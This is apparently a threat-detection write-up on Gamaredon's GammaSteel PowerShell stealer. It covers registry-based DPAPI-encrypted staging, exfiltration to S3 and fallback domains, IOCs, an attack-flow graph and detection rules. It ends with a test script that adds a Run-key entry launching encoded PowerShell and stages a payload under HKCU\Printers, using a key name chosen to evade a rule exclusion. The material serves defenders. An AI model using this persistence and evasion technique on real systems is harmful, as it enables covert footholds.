Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report describes GammaSteel, a new Gamaredon (UAC-0010) intrusion chain built around a fileless PowerShell stealer. The malware stores 71 encrypted functions in the HKCU\Printers registry key and protects them with Windows DPAPI. It collects documents from local drives, USB media, and files being actively edited, then deduplicates the data with MD5 before exfiltrating it to the legitimate S3-compatible service Tebi.io, with fallback to hard-coded Russian domains. The wider infrastructure also relies on dead-drop resolvers hosted on public platforms such as Telegram, Telegra.ph, Write.as, Rentry.co, and Mastodon, along with dynamic DNS services. The campaign continues to target Ukrainian government and critical infrastructure environments.
Investigation
Sekoia.io analyzed more than 70 artifacts, rebuilt the full PowerShell dropper, and identified registry-based persistence, a mutex, hidden scheduled PowerShell execution, and a multi-layered exfiltration scheme. The researchers mapped the dead-drop resolver infrastructure, catalogued 115 IP addresses, four domains, and several S3 credential sets, and observed automated updates made through Mastodon posts. They also noted similarities with the 2020 InvisiMole activity, particularly the use of DPAPI-encrypted payloads stored in the registry.
Mitigation
Organizations should monitor for unusual writes to HKCU\Printers, creation of hidden PowerShell processes, and usage of the Global\assembly307 mutex. Outbound traffic to the identified S3 endpoint s3.tebi.io and fallback infrastructure such as justsstop.ru and 165.22.170.129 should be blocked. Defenders should also deploy detections for the specific iPhone-style user-agent string and for Registry Run entries that invoke PowerShell scripts.
Response
If GammaSteel activity is detected, isolate the affected host, collect the HKCU\Printers registry hive, extract the DPAPI-protected payloads, and decrypt them using the victim’s master key where possible. Hunt across the environment for related artifacts, block the identified command-and-control URLs and domains, reset any compromised credentials, and perform a full forensic review to identify additional malicious modules.
"graph TB %% Class definitions classDef technique fill:#e6f7ff classDef process fill:#ffebcc classDef action fill:#c2f0c2 classDef tool fill:#dddddd classDef storage fill:#ffe6e6 classDef network fill:#d9d9ff classDef data fill:#f0e68c %% Nodes u2013 techniques tech_T1027_009["<b>Technique</b> – <b>T1027.009 Embedded Payloads</b><br/>Obfuscates payload within another file"] class tech_T1027_009 technique tech_T1027_007["<b>Technique</b> – <b>T1027.007 Dynamic API Resolution</b><br/>Resolves APIs at runtime to avoid static analysis"] class tech_T1027_007 technique tech_T1027_002["<b>Technique</b> – <b>T1027.002 Software Packing</b><br/>Packages malicious code to hide its true nature"] class tech_T1027_002 technique tech_T1027_013["<b>Technique</b> – <b>T1027.013 Encrypted/Encoded File</b><br/>Encrypts data using DPAPI before storage"] class tech_T1027_013 technique tech_T1547_001["<b>Technique</b> – <b>T1547.001 Registry Run Keys / Startup Folder</b><br/>Adds a Run key to achieve persistence"] class tech_T1547_001 technique tech_T1037_005["<b>Technique</b> – <b>T1037.005 Startup Items</b><br/>Uses startup items for persistence"] class tech_T1037_005 technique tech_T1680["<b>Technique</b> – <b>T1680 Local Storage Discovery</b><br/>Discovers local drives and user profiles"] class tech_T1680 technique tech_T1135["<b>Technique</b> – <b>T1135 Network Share Discovery</b><br/>Finds shared network locations"] class tech_T1135 technique tech_T1006["<b>Technique</b> – <b>T1006 Direct Volume Access</b><br/>Accesses removable media directly"] class tech_T1006 technique tech_T1025["<b>Technique</b> – <b>T1025 Data from Removable Media</b><br/>Collects data from USB devices"] class tech_T1025 technique tech_T1564_005["<b>Technique</b> – <b>T1564.005 Hidden File System</b><br/>Stores files in hidden locations"] class tech_T1564_005 technique tech_T1005["<b>Technique</b> – <b>T1005 Data from Local System</b><br/>Collects files from the local machine"] class tech_T1005 technique tech_T1537["<b>Technique</b> – <b>T1537 Transfer Data to Cloud Account</b><br/>Uploads stolen data to cloud storage"] class tech_T1537 technique tech_T1538["<b>Technique</b> – <b>T1538 Cloud Service Dashboard</b><br/>Uses cloud service interfaces for data exfiltration"] class tech_T1538 technique tech_T1102_001["<b>Technique</b> – <b>T1102.001 Web Service: Dead Drop Resolver</b><br/>Retrieves commands and configuration from public web services"] class tech_T1102_001 technique tech_T1620["<b>Technique</b> – <b>T1620 Reflective Code Loading</b><br/>Loads and executes code received at runtime"] class tech_T1620 technique %% Nodes u2013 actions and components malware_dropper["<b>Malware</b> – <b>Name</b>: Initial Dropper<br/><b>Description</b>: Executes obfuscated PowerShell script"] class malware_dropper process process_powershell["<b>Process</b> – <b>Name</b>: PowerShell<br/><b>Role</b>: Runs encoded script"] class process_powershell process storage_dpapi["<b>Storage</b> – <b>Location</b>: HKCU\Printers<br/><b>Content</b>: 71 functions encrypted with DPAPI"] class storage_dpapi storage persistence_runkey["<b>Action</b> – <b>Persistence</b>: Registry Run key<br/><b>Key</b>: HKCU\Software\Microsoft\Windows\CurrentVersion\Run"] class persistence_runkey action process_hidden_ps["<b>Process</b> – <b>Name</b>: Hidden PowerShell<br/><b>Purpose</b>: Reads orchestrator from registry"] class process_hidden_ps process orchestrator["<b>Action</b> – <b>Orchestrator</b>: Enumerates resources and coordinates collection"] class orchestrator action enumeration["<b>Action</b> – <b>Enumeration</b>: Drives, profiles, network shares"] class enumeration action collection["<b>Action</b> – <b>Collection</b>: Gathers files from local and network locations"] class collection action monitor_usb["<b>Action</b> – <b>USB Monitoring</b>: WMI event subscription for removable media"] class monitor_usb action staging_folder["<b>Storage</b> – <b>Hidden Folder</b>: Staging area for copied files"] class staging_folder storage fs_watcher["<b>Process</b> – <b>Name</b>: FileSystemWatcher<br/><b>Function</b>: Monitors nonu2011USB drives for changes"] class fs_watcher process deduplication["<b>Action</b> – <b>Deduplication</b>: Removes duplicate files before exfiltration"] class deduplication action upload_s3["<b>Action</b> – <b>Upload</b>: Sends data to S3u2011compatible bucket (tebi.io)"] class upload_s3 network fallback_post["<b>Action</b> – <b>Fallback Exfiltration</b>: POST to C2 domains mimicking iPhone UA"] class fallback_post network dead_drop["<b>Action</b> – <b>Dead Drop Resolver</b>: Retrieves config from Telegram, Telegra.ph, Write.as, Rentry.co, Mastodon"] class dead_drop action vbscript_backdoor["<b>Action</b> – <b>Secondary Backdoor</b>: Executes arbitrary VBScript from HTTP response"] class vbscript_backdoor action %% Connections u2013 flow malware_dropper –>|uses| tech_T1027_009 malware_dropper –>|uses| tech_T1027_007 malware_dropper –>|uses| tech_T1027_002 malware_dropper –>|stores encrypted data| tech_T1027_013 malware_dropper –>|launches| process_powershell process_powershell –>|writes encrypted functions to| storage_dpapi storage_dpapi –>|enables| persistence_runkey persistence_runkey –>|creates| tech_T1547_001 persistence_runkey –>|creates| tech_T1037_005 persistence_runkey –>|starts| process_hidden_ps process_hidden_ps –>|loads orchestrator from registry| orchestrator orchestrator –>|performs| enumeration enumeration –>|covers| tech_T1680 enumeration –>|covers| tech_T1135 orchestrator –>|collects data using| collection collection –>|uses| tech_T1005 collection –>|includes removable media via| tech_T1025 collection –>|includes direct volume access via| tech_T1006 collection –>|triggers| monitor_usb monitor_usb –>|copies files to| staging_folder staging_folder –>|is hidden by| tech_T1564_005 staging_folder –>|monitored by| fs_watcher fs_watcher –>|detects changes and triggers| deduplication deduplication –>|uploads to cloud via| upload_s3 upload_s3 –>|relies on| tech_T1537 upload_s3 –>|fallback to| fallback_post fallback_post –>|relies on| tech_T1538 orchestrator –>|gets updates from| dead_drop dead_drop –>|uses| tech_T1102_001 dead_drop –>|delivers| vbscript_backdoor vbscript_backdoor –>|leverages| tech_T1620 %% Styling assignments class malware_dropper,process_powershell,process_hidden_ps,fs_watcher,orchestrator,monitor_usb,vbscript_backdoor builtin class storage_dpapi,staging_folder builtin class persistence_runkey,enumeration,collection,deduplication,upload_s3,fallback_post,dead_drop action class tech_T1027_009,tech_T1027_007,tech_T1027_002,tech_T1027_013,tech_T1547_001,tech_T1037_005,tech_T1680,tech_T1135,tech_T1006,tech_T1025,tech_T1564_005,tech_T1005,tech_T1537,tech_T1538,tech_T1102_001,tech_T1620 technique "
Attack Flow
Detections
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
View
LOLBAS WScript / CScript (via process_creation)
View
Possible System Information Discovery Using Wmi Powershell Module (via powershell)
View
Suspicious Process DNS Query Known Abuse Web Services (via network_connection)
View
Possible Cloudflare Development Domain Abuse (via dns)
View
IOCs (SourceIP) to detect: FSB’s matryoshka #3/3 – Gamaredon’s gifts that keeps unpacking – GammaSteel
View
IOCs (DestinationIP) to detect: FSB’s matryoshka #3/3 – Gamaredon’s gifts that keeps unpacking – GammaSteel
View
Detection of Hidden PowerShell Execution for Gamaredon Operations [Windows Powershell]
View
Detection of Gamaredon PowerShell Registry Staging Technique [Windows Registry Event]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
The attacker, having compromised a low‑privileged user account, wants to stage an encrypted PowerShell payload without touching the file system. They write the Base64‑encoded payload into theRunkey so it executes on the next logon. To avoid the rule’s single exclusion, they deliberately use a sub‑key underHKCUPrintersthat is not the excluded value, mimicking the “printer‑staging” pattern observed in Gamaredon samples. -
Regression Test Script:
# -------------------------------------------------------------- # Simulate Gamaredon PowerShell Registry Staging (TC-20260608-A1B2C) # -------------------------------------------------------------- # 1. Define a Base64‑encoded, harmless PowerShell command (e.g., write a file) $payload = 'Write-Host "Gamaredon simulation executed"' $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload)) # 2. Persist the payload via the Run key (persistence) $runKey = 'HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun' New-ItemProperty -Path $runKey -Name 'GamaredonStager' -Value "powershell -enc $b64" -PropertyType String -Force # 3. Stage the same payload in a “printer” key (file‑less staging) $printerKey = 'HKCU:PrintersYxwHku2chu0bznt3kkyAD' # Note: different suffix to avoid exclusion New-Item -Path $printerKey -Force | Out-Null Set-ItemProperty -Path $printerKey -Name 'EncryptedPS' -Value $b64 -Force Write-Host "Simulation complete – registry entries created." -
Cleanup Commands:
# Remove Run key entry Remove-ItemProperty -Path 'HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun' -Name 'GamaredonStager' -ErrorAction SilentlyContinue # Remove printer staging key Remove-Item -Path 'HKCU:PrintersYxwHku2chu0bznt3kkyAD' -Recurse -Force -ErrorAction SilentlyContinue Write-Host "Cleanup complete – registry artifacts removed."